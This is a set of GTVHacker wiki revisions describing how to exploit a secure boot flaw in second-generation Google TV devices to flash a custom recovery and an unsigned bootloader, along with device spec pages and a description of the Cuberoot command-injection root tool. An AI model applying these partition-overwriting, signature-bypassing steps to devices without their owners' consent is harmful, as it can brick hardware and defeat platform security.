[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-07T23:57:41Z

CJ: /* Custom Recovery Steps (Sony) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery b 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cd /data/local/tmp
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>cd /data/local/tmp
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-mtd8</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.
*To then boot from USB (try other ports if its not detected):
<code>usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 </code>
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it's filesize

== Troubleshooting ==

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-07T01:01:39Z

CJ: /* Custom Recovery Steps (Sony) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery c 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cd /data/local/tmp
#: dd if=/mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-recovery bs=2048</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>cd /data/local/tmp
#: dd if=/mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-mtd8 bs=2048</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.

== Troubleshooting ==

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Installing Custom Recovery (Gen 2 Only)

2013-08-07T01:01:11Z

CJ: /* Developers Only (SONY) (UART console required) */

== About ==
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.)

== Devices ==
*ASUS Cube
*Hisense Pulse
*Sony NSZ-GS7/GS8

== Warnings ==
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.
*This may brick your GTV. It shouldn't, but it still might!

== Tools Needed ==
*Linux Live CD or Linux Installed
*A vulnerable Google TV device.
*1 USB Drive (to be formatted)

== Pre-Setup ==
#Boot Linux (Live CD or Install)
#Download Custom Recovery Package for Device
#Unzip Custom Recovery Package

== Custom Recovery Steps (Cube and Pulse) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the recovery mtd.
#: <code>mknod gtvhacker-recovery c 90 32</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (CUBE, PULSE) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 90 16</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: nandwrite
#: flash_erase
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Now, issue these commands:
#: <code>cp flash_erase /data/local/tmp
#: cp nandwrite /data/local/tmp
#: chmod 755 /data/local/tmp/flash_erase
#: chmod 755 /data/local/tmp/nandwrite
#: cd /data/local/tmp</code>
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.

== Custom Recovery Steps (Sony) ==
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/block for the recovery block.
#: <code>mknod gtvhacker-recovery c 179 10</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#To find out what USB drive you plugged in, issue this command:
#: <code>ls /mnt/media/
#: cd /mnt/media/usb.LABEL (where label = the rest from above)</code>
#Install the recovery (where usb.LABEL is the name of your usb drive from above):
#: <code>
#: cd /data/local/tmp
#: dd of=/mnt/media/usb.LABEL/gtvhacker-recovery if=/mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin bs=2048</code>
#Issue an adb reboot, and you have a custom recovery.

== Developers Only (SONY) (UART console required) ==
''' We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.'''
To install the uboot custom bootloader (developers only, UART console required):
#Format a drive NTFS, and mount it.
#cd to the drive, and issue the following commands:
#: The major and minor hash for these commands is pulled from an "ls -l" on /dev/mtd for the kernel mtd.
#: <code>mknod gtvhacker-kernel c 179 7</code>
#Then, copy over our files for your specific box, to the root of your NTFS flash drive
#: uboot-VENDOR-MODEL-GTVHACKER.bin
#Unmount the drive, and insert it into your Google TV.
#Connect via adb, and issue the shell command.
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):
#: <code>cd /data/local/tmp
#: dd if=/mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin of=/mnt/media/usb.LABEL/gtvhacker-mtd8 bs=2048</code>
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.

== Troubleshooting ==

*You can get help from us or other users at:

[http://forum.gtvhacker.com/ GTVHacker Forums]

[http://www.gtvhacker.com GTVHacker Wiki]

*or you can chat with us on IRC at:

irc.freenode.net #gtvhacker

[http://webchat.freenode.net/?randomnick=1&channels=gtvhacker&uio=d4 Freenode Webchat]

(Someone may not be around right away to help, make sure to be willing to wait for a response)

== Download ==

'''Custom Recovery:'''
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]

Sony NSZ-GS7 (Streamer)

2013-07-29T12:50:00Z

CJ: /* Update History */

__FORCETOC__
{{Disclaimer}}
[[File:Sony-NSZ-GS7.jpg|250px|left|thumb]]
[[Category:Sony]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Sony NSZ-GS7 (Network Streamer).

== Specs ==
*Marvell Armada 1500(88de3100)<sup>1</sup> 1.2 GHz dual-core processor, with a 750 MHz GPU<sup>2</sup>
*1 GB DDR3 Memory
*8 GB Samsung Flash NAND - KLM8G2FEJA-A002

== Tear Down ==
<gallery>
File:Sony nsz-gs7 top board1.jpg
File:Sony nsz-gs7 top board2.jpg
File:Sony nsz-gs7 top board3.jpg
File:Sony nsz-gs7 top board4.jpg
File:Sony nsz-gs7 top board5.jpg
File:Sony nsz-gs7 top board6.jpg
File:Sony nsz-gs7 top board7.jpg
File:Sony nsz-gs7 bottom board.jpg
</gallery>

== Recovery Mode ==
[[File:Sony_nsz-gs7_recovery.jpg|thumb|left]]
#Unplug power from the NSZ-GS7
#Press and hold the connect button and plug the unit in.
#Continue to hold down the connect button for 5 seconds after plugging the unit in, then release the connect button.
#Wait a couple of seconds and the screen will show the recovery menu.
#You can use a USB keyboard to navigate through the menu or you can navigate using the connect button (Short press navigates down while a long press selects).

== Update History ==

USA:
*REL01_NSZGS7_U2_1046_663_3110_20120529_URSC - Factory Firmware
*REL02_NSZGS7_U2_1004_836_3621_20120620_URSC - First OTA Update - [http://android.clients.google.com/packages/data/ota/sony_beetle/4eca714a6734.PKG_REL02_NSZGS7_U2_1004_836_3621_20120620_URSC.zip Download]
*REL02_NSZGS7_U2_1005_887_3790_20120628_URSC - Second OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/2f2bf5208b2a.PKG_REL02_NSZGS7_U2_1005_887_3790_20120628_URSC.zip Download]
*REL03_NSZGS7_U2_1104_4384_20120724_URSC - Third OTA Update (Media Player Added) - [http://android.clients.google.com/packages/ota/sony_beetle/76bf93519436.PKG_REL03_NSZGS7_U2_1104_4384_20120724_URSC.zip Download]
*REL04_NSZGS7_U2_1210_5720_20120928_URSC - Fourth OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/5cae61486b96.PKG_REL04_NSZGS7_U2_1210_5720_20120928_URSC.zip Download]
*REL05_NSZGS7_U2_1303_6289_20121024_URSC - Fifth OTA Update - [http://android.clients.google.com/packages/data/ota/sony_beetle/8a35afb3c3ca.PKG_REL05_NSZGS7_U2_1303_6289_20121024_URSC.zip Download]
*REL06_NSZGS7_U2_1403_6928_20121120_URSC - Sixth OTA Update ([http://forum.gtvhacker.com/post7245.html#p7245 Change Log]) - [http://android.clients.google.com/packages/data/ota/sony_beetle/872faf0d8b49.PKG_REL06_NSZGS7_U2_1403_6928_20121120_URSC.zip Download]
*REL10_NSZGS7_U2_2203_133772_20130529_URSC - Tenth OTA Update - [http://android.clients.google.com/packages/ota/sony_beetle/f85aaa961c4e.PKG_REL10_NSZGS7_U2_2203_133772_20130529_URSC.zip Download]

Canada:
*REL03_NSZGS7_CA2_1104_4384_20120724_URSC - First OTA Update (Equivalent to 3rd US) - [http://android.clients.google.com/packages/ota/sony_beetle_ca2/f14f067ada65.PKG_REL03_NSZGS7_CA2_1104_4384_20120724_URSC.zip Download]

United Kingdom:

*REL03_NSZGS7_CEK_1104_4384_20120724_URSC - First OTA Update (Equivalent to 3rd US) - [http://android.clients.google.com/packages/ota/sony_beetle_cek/a75f9ea6d1b6.PKG_REL03_NSZGS7_CEK_1104_4384_20120724_URSC.zip Download]

== NSZ-GS7 Root Demo ==
On July 29th, 2012 the GTVHacker team demonstrated the first root for the NSZ-GS7 at DEFCON 20.

== GPL Code ==
You can find GPL code for the NSZ-GS7 at [http://www.sony.net/Products/Linux/TV/NSZ-GS7.html Sony Global]

== Related ==
1. http://www.marvell.com/digital-entertainment/armada-1500/assets/Marvell-ARMADA-1500-Product-Brief.pdf

2. http://www.account.anandtech.com/Show/Index/5296?cPage=3&all=False&sort=0&page=2&slug=google-tv-goes-arm-with-marvells-armada-1500

Asus Cube

2013-05-27T17:21:14Z

CJ: /* Cuberoot */

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
[[File:Cuberoot.png|200px|right|thumb]]
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download [http://download.gtvhacker.com/file/asus/Cuberoot.apk Here]

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

Asus Cube

2013-05-17T06:53:15Z

CJ: /* Cuberoot */

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
*4 GB Flash NAND
*Two USB Ports
*IR Blaster

== Cuberoot ==
[[File:Cuberoot.png|200px|right|thumb]]
Cuberoot was released May 17, 2013 for the Asus Cube by the GTVHacker team. This root leverages a local command execution vulnerability within a Unix socket for NFS mounting. This socket interfaces with a helper application that doesn’t properly sanitize input allowing local code execution.

This particular vulnerability is made better by being able to be exploited from within an Android app, and allows us to provide users with an easy method of patching their device to prevent another application from exploiting the bug for nefarious reasons.

Cuberoot will:
*Root your Asus Cube.
*Install SuperSu.
*Modify the Flash Player to bypass website blocks on streaming media sites.
*Disable automatic updates.
*Collect anonymous statistical information about your device.
*Allow you to patch this vulnerability, which prevents malicious applications from using this bug.

Download [http://blog.gtvhacker.com/2013/rooting-your-asus-cube-with-cuberoot/download.gtvhacker.com/file/asus/Cuberoot.apk Here]

== Gallery ==
<gallery>
File:Asus_cube_teardown1.jpg
File:Asus_cube_teardown2.jpg
File:Asus_cube_teardown3.jpg
File:Asus_cube_teardown4.jpg
File:Asus_cube_teardown5.jpg
File:Asus_cube_teardown6.jpg
File:Asus_cube_teardown7.jpg
File:Asus_cube_teardown8.jpg
File:Asus_cube_teardown9.jpg
File:Asus_cube_teardown10.jpg
File:Asus_cube_teardown11.jpg
File:Asus_cube_teardown12.jpg
File:Asus_cube_teardown13.jpg
File:Asus_cube_teardown14.jpg
File:Asus_cube_teardown15.jpg
File:Asus_cube_teardown16.jpg
File:Asus_cube_teardown17.jpg
File:Asus_cube_teardown18.jpg
File:Asus_cube_teardown19.jpg
File:Asus_cube_teardown20.jpg
</gallery>

== Update History ==
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the "Asus Qube"
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as "Cube", adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]

== Connections / Connectors / Switches ==
*J2 - SPI ?
*UART1 - UART (115200 8n1)
*UART2
*RF_CON - Remote Control Antenna Board
*WIFI_CON - WiFi / BT Antenna Board (SDIO)
*SW1 - Factory Reset

Asus Cube

2013-05-17T06:52:51Z

CJ:

__FORCETOC__
{{Disclaimer}}
[[File:Asus_cube.jpg|200px|left|thumb]]
[[Category:Asus]]
This page will be dedicated to the hardware specifications, descriptions, and information related to the Asus Cube (Formerly Qube).

== Purchase ==
Buying Google TV devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next Google TV.

[http://www.amazon.com/gp/product/B00CBYYKKY/ref=as_li_ss_tl?ie=UTF8&tag=gtvcom-20&linkCode=as2&camp=1789&creative=390957&creativeASIN=B00AM0ESC4 Purchase the Asus Cube at Amazon]

== Specs ==
These specifications are unverified, but based off of the SOC this should hold to be "trueish".
We will update this once the hardware ships.
*Marvell Armada 1500(88DE3100) 1.2 GHz dual-core processor, with a 750 MHz GPU
*1 GB DDR3 Memory
